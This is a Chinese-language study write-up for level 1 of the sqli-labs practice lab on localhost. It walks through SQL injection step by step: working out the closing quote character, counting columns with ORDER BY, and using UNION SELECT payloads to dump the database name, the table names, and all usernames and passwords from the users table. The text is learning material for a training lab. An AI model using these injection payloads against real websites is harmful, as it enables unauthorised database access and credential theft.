sqli-labs第一关:有回显位的提示信息注入
(一到四关的注入方式类似,只是SQL语句的闭合方式不同)
第一步:直接输入网址:
127.0.0.1/sqli-labs-master/Less-1/
第二步:设置id=1,确定是否与数据库有交互
127.0.0.1/sqli-labs-master/Less-1/?id=1
第三步:利用 order by 判断当前使用的表有多少个字段,当后面的数字超出当前表的字段后,页面会报错,只有当小于或等于当前表的字段数时,页面才会正常显示
http://127.0.0.1/sqli-labs-master/Less-1/?id=1 ' order by 4 --+
其中“'”为当前SQL语句(第一关)的闭合符号,需要使用一定的时间判断闭合符号。“–+”为MySQL中的注释符,使后面的SQL语句不会被执行,如下图可知,当前表格一共有3个字段,当数字为4时,页面报错
判断闭合符的方式可以使用一些特殊的字符,如“\”
*http://127.0.0.1/sqli-labs-master/Less-1/?id=1*
报错信息中可能会给出闭合符号。如下图的闭合符号是“')”
第四步:确定显示位
http://127.0.0.1/sqli-labs-master/Less-1/?id=-1' union select 1,2,3 --+
利用联合查询语句,是前面的查询语句失效,然后利用select语出在表的添加一条临时的记录1,2,3,使页面显示对应的数字,从而判断网页中显示的是哪几个字段的数据信息。如下图,对应的信息显示位为2和3,可以知道,当前查询语句查询的是表格的第2,3个字段的内容。
第五步:在对应的位置编写SQL语句,进行SQL注入
Database()
可以显示数据库名
http://127.0.0.1/sqli-labs-master/Less-1/?id=-1’
union select 1,database(),3 --+
group_concat(table_name)
from information_Schema.tables where table_schema=‘security’
可以显示指定数据库中的所有表名
http://127.0.0.1/sqli-labs-master/Less-1/?id=-1’
union select 1,(group_concat(table_name)), 3 from information_Schema.tables where table_schema=‘security’
–+
(select group_concat(password)
from security.users)
显示字段名
http://127.0.0.1/sqli-labs-master/Less-1/?id=-1’
union select 1,(select group_concat(password) from security.users),
(select group_concat(username) from security.users) --+
上SQL语句的作用是查询security数据库中users表下password字段和name字段的所有内容
以上内容为个人学习的内容,如有错误请路过的大佬指正。